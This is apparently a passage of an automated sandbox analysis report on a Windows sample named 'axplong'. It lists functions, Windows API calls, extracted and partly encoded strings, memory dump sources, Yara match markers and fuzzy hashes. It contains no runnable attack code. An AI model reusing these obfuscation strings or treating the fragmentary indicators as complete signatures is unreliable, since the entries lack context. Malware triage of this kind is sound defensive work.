                        • Instruction Fuzzy Hash: 29E17C71900218AFEB24EBA4CC89BEDB7BAEF05304F5442D9E509A7291DB749FC48F51

                        Control-flow Graph
                        • Function 6a7d00; API calls in graph: GetNativeSystemInfo
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006A7EA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                        • API String ID: 1721193555-2057465332
                        • Opcode ID: 09ebf98a8df59726804081c8beb613d7fa7f87ac420afadfafd5d6c90c39a71a
                        • Instruction ID: 6575b1b74ec69792de74408c8396b3b2c23112a1f41bc8b1be5cd842e287f567
                        • Opcode Fuzzy Hash: 09ebf98a8df59726804081c8beb613d7fa7f87ac420afadfafd5d6c90c39a71a
                        • Instruction Fuzzy Hash: CCD1A3B1E00604DBDB14FB68CC5A3AD7667AB82320F54429CE4166B3D2DB395F818BD6

                        Control-flow Graph
                        • Function 6d6e01; API calls in graph: GetFileType, GetFileInformationByHandle
                        APIs
                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 006D6E23
                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 006D6E7D
                        • __dosmaperr.LIBCMT ref: 006D6F12
                          • Part of subcall function 006D7177: __dosmaperr.LIBCMT ref: 006D71AC
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: File__dosmaperr$HandleInformationType
                        • String ID:
                        • API String ID: 2531987475-0
                        • Opcode ID: 735de863680251b4a8978039cc9afe461c09cd0f0e6c8079c91a0b1a8cc29abf
                        • Instruction ID: f6a46f7c542bfe0b6d3f5ac89e3fc8616597cb7b2a78fcd39c8a8dcc3c65e070
                        • Opcode Fuzzy Hash: 735de863680251b4a8978039cc9afe461c09cd0f0e6c8079c91a0b1a8cc29abf
                        • Instruction Fuzzy Hash: 58414D76D00644ABCB24EFB5EC459ABB7FAEF88300B14452EF456D3750EB309905CB65

                        Control-flow Graph
                        • Function 6dd4f4; API calls in graph: RtlAllocateHeap
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: hpGm
                        • API String ID: 0-119319687
                        • Opcode ID: b8f32fc9b6b472bf10cf89feec7a041e73dd5cd12a0a8c10f77bf9ad07d6f0d1
                        • Instruction ID: 4cc209cd7b0f0f6cab954624f3f75ef805c55481f4d6fe4397e5a33b0bd3e9af
                        • Opcode Fuzzy Hash: b8f32fc9b6b472bf10cf89feec7a041e73dd5cd12a0a8c10f77bf9ad07d6f0d1
                        • Instruction Fuzzy Hash: 56610372D002149FDF25FFA8E8856EDBBB3AF55314F24811BE448AB390D6309C01CBA5

                        Control-flow Graph
                        • Function 6a82b0; API calls in graph: GetNativeSystemInfo
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 006A8454
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: a166eb1c114a74b41ea33f785f1f5a1fa22bdc7b9f41bb596b923f984c37ceb4
                        • Instruction ID: 205db82eb276414871eddd3b98c2cca1a8feca3e310a0ef61637d30328594756
                        • Opcode Fuzzy Hash: a166eb1c114a74b41ea33f785f1f5a1fa22bdc7b9f41bb596b923f984c37ceb4
                        • Instruction Fuzzy Hash: 635116B1D102089FDB24FB68CD497DDB7B6DB46310F5042A9E805A7381EF349E808FA5

                        Control-flow Graph
                        • Function 6d6c99; API calls in graph: CreateFileW
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f24b96d6cf7bf910730ea47641348f2e80a5203dd72387c3f5c22cfe6da9d77
                        • Instruction ID: 6f5a5afd3bf305b79c2bd3163184ca3ae582e273c179ab415606f167e1e27ddb
                        • Opcode Fuzzy Hash: 9f24b96d6cf7bf910730ea47641348f2e80a5203dd72387c3f5c22cfe6da9d77
                        • Instruction Fuzzy Hash: 2A21F831E052087AEB11BB64EC42B9E376B9F41378F204316F9242B3D1DBB05E0596A6

                        Control-flow Graph
                        • Function 6d6f71; API calls in graph: SystemTimeToTzSpecificLocalTime
                        APIs
                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 006D6FB3
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$LocalSpecificSystem
                        • String ID:
                        • API String ID: 2574697306-0
                        • Opcode ID: 3d8f88e0c0c57dd0599b377cc70bca44e4d0545c2f575564acbf5c2955b0a11b
                        • Instruction ID: 801d23c7b3c1b4c7e224921c194d2a52413384d0d025fdfca1ed8df32510e721
                        • Opcode Fuzzy Hash: 3d8f88e0c0c57dd0599b377cc70bca44e4d0545c2f575564acbf5c2955b0a11b
                        • Instruction Fuzzy Hash: 9511CBB290060CAACB10DF95D945EDEB7BEAF48310F505266F511E6281EB30EB458B61

                        Control-flow Graph
                        • Function 6dd6ef; API calls in graph: RtlAllocateHeap
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,006DA5ED,?,006D74AE,?,00000000,?), ref: 006DD730
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 73a7fdcf63fc64005faa0f2e1bddb378b228ad0cdf0bb4b14b7ce93b1cc7751b
                        • Instruction ID: 7d9a8adbdbaafa6e3a06f44ee14614c36c0e04416a63092a707c8e61ed5b5665
                        • Opcode Fuzzy Hash: 73a7fdcf63fc64005faa0f2e1bddb378b228ad0cdf0bb4b14b7ce93b1cc7751b
                        • Instruction Fuzzy Hash: FFF02E31D4612466DB313A229C01BAB3B9B9F817B0B198197FC14EB381CE21DC0043F5

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: bc173597f2bbb16582a69d9df61d167f88813830b6fb691ea53c0e959cc10f07
                        • Instruction ID: df78f8e64dfdac9675f6f110a7318be8a1c434c0e27d7547be099ff7defb477e
                        • Opcode Fuzzy Hash: bc173597f2bbb16582a69d9df61d167f88813830b6fb691ea53c0e959cc10f07
                        • Instruction Fuzzy Hash: AAF0A9B1E00614EBC700BB68DD1775D7B76A747760F90035CE811672D2EA3859018BE6
                        Memory Dump Source
                        • Source File: 00000007.00000002.3249409115.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_52e0000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8feb7c84365b1fad81342d1aac53a088ecaa3b9fecf4f358f2b58ee20b6697d
                        • Instruction ID: 41acc59b291e61a9a388b2de9b8a19ea510e25a0d958f7fbfb3ea51d9673ad9f
                        • Opcode Fuzzy Hash: a8feb7c84365b1fad81342d1aac53a088ecaa3b9fecf4f358f2b58ee20b6697d
                        • Instruction Fuzzy Hash: FB01E1EB0BC014BE5142C58A271C9F67A2FFEE77303B8852AF907D550192E4464B5230
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4p$fed3aa
                        • API String ID: 0-3096440064
                        • Opcode ID: df1e1435d0e9f6a6188f4bf144a15269832ce7aa785098b688b68f6c1038c803
                        • Instruction ID: c1aa9052ab39e1ee3d5c23202e101613c8b31f20a2b8d813236c4f9081fc4512
                        • Opcode Fuzzy Hash: df1e1435d0e9f6a6188f4bf144a15269832ce7aa785098b688b68f6c1038c803
                        • Instruction Fuzzy Hash: A372F6B0A04248DBEF14EF68C9497DE7FB6AF46304F50419DE805273C2D7799A88CB96
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: c8030a1ebf042db17d502c7ba83f0cafd6d1fa13027493bee2a9bddf7721cf25
                        • Instruction ID: dd797d2c0e39081ced5aac4cc96bb9a11cc2cedeccaff7ee865e3e7f23d7d9d5
                        • Opcode Fuzzy Hash: c8030a1ebf042db17d502c7ba83f0cafd6d1fa13027493bee2a9bddf7721cf25
                        • Instruction Fuzzy Hash: 40C23A71E096688FCB65CE29DD447E9B3B6EB48304F1441EAD84EE7340EB75AE858F40
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction ID: b3d6666d84c788a2f0dd6c6f1fe152b3e9e619646ad64144ffa80af8cfd3eb81
                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction Fuzzy Hash: 72F16F71E0125A9FDF14CFA9C8906EEB7B6FF88314F158269D519AB344D730AE41CB90
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A247E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: 'kkd+p$'kkd+p
                        • API String ID: 2659868963-3582003783
                        • Opcode ID: 3ccbeb0b1b7019f32d2b490c868f1d383a1cb35c0b44a941fcb26f425cb68a0f
                        • Instruction ID: 78adb45d3666eaa374bcf80236354b4741612dc2e8ab0c31515f3731081b8118
                        • Opcode Fuzzy Hash: 3ccbeb0b1b7019f32d2b490c868f1d383a1cb35c0b44a941fcb26f425cb68a0f
                        • Instruction Fuzzy Hash: 215189B2A00606DFDB15CF58D8856EABBF6FB08310F24C66AD444EB351EB399981CF54
                        APIs
                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,006BCE82,?,?,?,?,006BCEB7,?,?,?,?,?,?,006BC42D,?,00000001), ref: 006BCB33
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FilePreciseSystem
                        • String ID:
                        • API String ID: 1802150274-0
                        • Opcode ID: bd20197f50ce00a1d9dffe4d32dd82c48d3f47aeebf2bff3a8e338a8e8c095d7
                        • Instruction ID: 3d112fdda333724bde1772e702a67ba8889d19eaeb6ab5d016151c6efb854c0c
                        • Opcode Fuzzy Hash: bd20197f50ce00a1d9dffe4d32dd82c48d3f47aeebf2bff3a8e338a8e8c095d7
                        • Instruction Fuzzy Hash: E9D02232A0213CD3CA212B90AC0C8EDBB1A8F80B303004211E80423320CE51AE818BF4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction ID: bf3c8f558f9a9561c1ebe86408a8a7cb94cf71af10dff4905b8c88cb286c6cac
                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction Fuzzy Hash: 84519C70E0C7485ADF388A38889A7FEA79B9F91300F18045FD482D7782FA11ED45879B
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b24c6a30df1f7654235bd64d912a4d4c193f0755c89aa0df0f6e3b8344f9be5
                        • Instruction ID: a85315532734ef0be21ef4b9a8d244a4883923967f37abbfcdc13df0140a5492
                        • Opcode Fuzzy Hash: 7b24c6a30df1f7654235bd64d912a4d4c193f0755c89aa0df0f6e3b8344f9be5
                        • Instruction Fuzzy Hash: 372260B3F515144BDB4CCA9DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9158648
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11c15bec0cee7048244cd351c28e06852c4a3691618471aff2cee09e528847cf
                        • Instruction ID: 293bd7279e55c747ea0b27493e77209d643265cb0b1a1f7fce616a99a8ade61f
                        • Opcode Fuzzy Hash: 11c15bec0cee7048244cd351c28e06852c4a3691618471aff2cee09e528847cf
                        • Instruction Fuzzy Hash: 14B17B71225748CFD718CF29C486BA57BA2FF45364F298658E899CF3A1C335E982CB40
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73a837564ce66f837d98e4525fed35ef2faddfff327918bf73c65429c2f25bc7
                        • Instruction ID: adb4e687e5bbd14e3cf7f32d76c4a7cfb1610cdb0cdce2eee9c0971d46d6c053
                        • Opcode Fuzzy Hash: 73a837564ce66f837d98e4525fed35ef2faddfff327918bf73c65429c2f25bc7
                        • Instruction Fuzzy Hash: FF51B67161D7918FC319CF2D8515236BBE2AFD6200F084A9EE0E687392D774DA44CBA1
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bcf241eba467c1696b91a68f2fdb85c78c4a2e45728051f4434f1f4e588d0002
                        • Instruction ID: 93db9cf043bc67081a4db14aeb06f8d202e1954d9855a5dd11b9f6bd4ab30dff
                        • Opcode Fuzzy Hash: bcf241eba467c1696b91a68f2fdb85c78c4a2e45728051f4434f1f4e588d0002
                        • Instruction Fuzzy Hash: 3321B673F205394B770CC47E8C5727DB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79e784836c8debc653178657ce60aa99c22faabad10f0b81412c65e99b4a8b3c
                        • Instruction ID: a73b807d59b34b055c69596e875c892bf28098b02f495199e163c7cac35fa926
                        • Opcode Fuzzy Hash: 79e784836c8debc653178657ce60aa99c22faabad10f0b81412c65e99b4a8b3c
                        • Instruction Fuzzy Hash: F611CA23F30C255B675C817D8C132BAA6D3DBD824030F433AD826EB384E994DE23D290
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 4b4308be687afb9c84b448fa61e0c4d97cfc6b567a7b914391d7fda7e672a3ce
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: F011D6772023C14FDE05862FC9B45EEA797EAC532273C4265D0494B758D92399459500
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38f4847725409d6a79445db716442eb57e8fe3bcd0d5fc61caf97773013c07de
                        • Instruction ID: ba0defd50fdb41829f2bea1ef4e52b840c7cc59e24bc0018909dd9b28ccad2da
                        • Opcode Fuzzy Hash: 38f4847725409d6a79445db716442eb57e8fe3bcd0d5fc61caf97773013c07de
                        • Instruction Fuzzy Hash: 99E08C31A526086FCE257B54DA1C9887B9BEF15345F00991AFC0846322CB25EC81CA91
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction ID: ff0324256ae0cb8bf7f212fdfe2e01f35253d58062e7ce0405e3bd37f3b86210
                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction Fuzzy Hash: 0BE04632915228EBCB15DBC8890498AF2ADEB48B00F15409BB501D3240C270DF00C7D4
                        APIs
                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006B795C
                        • __Cnd_destroy_in_situ.LIBCPMT ref: 006B7968
                        • __Mtx_destroy_in_situ.LIBCPMT ref: 006B7971
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                        • String ID: 'kkd+p$@yk$d+p
                        • API String ID: 4078500453-3556248620
                        • Opcode ID: 73bbcfbb0283a28885d8013f3290a81a4208777fdd1a304cb8d40e5e5915fdb6
                        • Instruction ID: c8b407c609291b9885753d6f6d6cb7ec66510b2cc73e5d0406006c025dcd3e94
                        • Opcode Fuzzy Hash: 73bbcfbb0283a28885d8013f3290a81a4208777fdd1a304cb8d40e5e5915fdb6
                        • Instruction Fuzzy Hash: 1431F4F2A047049FD720EF68D845AAAB7E9EF54310F000A7EE945C7342E771EA94C7A5
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 322a8fd755a83e8e93e8ae507b93c58031cfcb84e0066f890807ce62010f3e41
                        • Instruction ID: 6caf99ddc25e1fcb05e157d5267f09de6159ddb20482132122b0c1633e164e8e
                        • Opcode Fuzzy Hash: 322a8fd755a83e8e93e8ae507b93c58031cfcb84e0066f890807ce62010f3e41
                        • Instruction Fuzzy Hash: ED012B37E086172616182419AC126BF179B9B83FB472F012FFA44FB3C1FE44DC028195
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID: Mtx_unlock$Cnd_broadcast
                        • String ID:
                        • API String ID: 32384418-0
                        • Opcode ID: 5843ebc370e9963bce27722b2e0524d880de5a39a0090370f5d68ebdfd68545d
                        • Instruction ID: cc793d8039f125207f5bf6ac73b5052cd96424e980a76b374f1a082c1f51b100
                        • Opcode Fuzzy Hash: 5843ebc370e9963bce27722b2e0524d880de5a39a0090370f5d68ebdfd68545d
                        • Instruction Fuzzy Hash: 7CA1D1B1A413169FDB21EF68C844BDAB7AABF16324F00412DE815D7342EB30EE45CB91
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A2806
                        • ___std_exception_destroy.LIBVCRUNTIME ref: 006A28A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Similarity
                        • API ID: ___std_exception_copy___std_exception_destroy
                        • String ID: P#j$P#j
                        • API String ID: 2970364248-3156330307
                        • Opcode ID: cda426864b54f6b4d1bb9ffbbddc21180e75feaf6efe62b09c856008b0c84dc9
                        • Instruction ID: 4d2f1bfa4bdbefcf8e3c8a1830a7832fd1467bf9991ca2c767305631e33f69f2
                        • Opcode Fuzzy Hash: cda426864b54f6b4d1bb9ffbbddc21180e75feaf6efe62b09c856008b0c84dc9
                        • Instruction Fuzzy Hash: 30719271E002099FDB04DFA8C891BEDFBB6EF59310F14416DE805A7346EB74A984CBA5
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A2B23
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: P#j$P#j$This function cannot be called on a default constructed task
                        • API String ID: 2659868963-1761824029
                        • Opcode ID: 015fa2a393d87cbf59cef0c2b61b8c87c28eac894bcf4900d32d1d085da6b7c9
                        • Instruction ID: 3b27e8ce837e21830050296d242d79db5b0abf5562c9dc61e465b27c1c35288d
                        • Opcode Fuzzy Hash: 015fa2a393d87cbf59cef0c2b61b8c87c28eac894bcf4900d32d1d085da6b7c9
                        • Instruction Fuzzy Hash: AEF09C71A1030C9BC710DF6C98419EEBBEE9F15300F50419DF90457701EB71AA548B99
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A247E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: 'kkd+p$P#j$P#j
                        • API String ID: 2659868963-847949053
                        • Opcode ID: 58f6f86bdce5c36f0a58a5e0a8cecc11fbc3a4224ee50c3f2262d5815ead4f19
                        • Instruction ID: 6c62f6ad593cdfab6a841bb9b39f554b931e387d332d210aedb43ea6d5a92f77
                        • Opcode Fuzzy Hash: 58f6f86bdce5c36f0a58a5e0a8cecc11fbc3a4224ee50c3f2262d5815ead4f19
                        • Instruction Fuzzy Hash: 2DF0A0B1D1020D67C714EFE8D801989B7ADDA16310B008A2AF744E7601F7B0FA448B9A
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction ID: fc7553eb00f5effcc3d96cf9f8904be3e75ab629dae9a1cb9ee03d2aeb974f91
                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction Fuzzy Hash: 3DB10532D1028A9FDB11CF68C881BEEBBA7EF55360F1481ABE5599B341D6349D42CB60
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xtime_diff_to_millis2_xtime_get
                        • String ID:
                        • API String ID: 531285432-0
                        • Opcode ID: 368be0cbb52661d506d1026df0053bcb9163612128ec834276cb347414ed7456
                        • Instruction ID: 029f717703a7f2dd00d3e968ee31b7469187da54e4748192b7e28704d98a8659
                        • Opcode Fuzzy Hash: 368be0cbb52661d506d1026df0053bcb9163612128ec834276cb347414ed7456
                        • Instruction Fuzzy Hash: F22153B1A001099FDF10EFA4CC819FEBB7AEF48720F004069F601A7261DB70AE418BA5
                        APIs
                        • __Mtx_init_in_situ.LIBCPMT ref: 006B726C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_init_in_situ
                        • String ID: @.j$`zk
                        • API String ID: 3366076730-1601469256
                        • Opcode ID: 65196ed00f59b10e89c9991b005f289436453a5f21bbf12988589f0f8e763608
                        • Instruction ID: 8fc2c1afde4d3b0e48e3386d3c46117d5236698a75af3e98de47d849aa3c1896
                        • Opcode Fuzzy Hash: 65196ed00f59b10e89c9991b005f289436453a5f21bbf12988589f0f8e763608
                        • Instruction Fuzzy Hash: F7A137B0E016198FDB21CFA8C88479EBBF2BF49710F188159E919AB351EB759D41CF90
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___free_lconv_mon
                        • String ID: 8"p$`'p
                        • API String ID: 3903695350-1477525673
                        • Opcode ID: de205fa9be4a0f97bd6701cea94ba7e8dcc399755ff42df4851b49c240e67f39
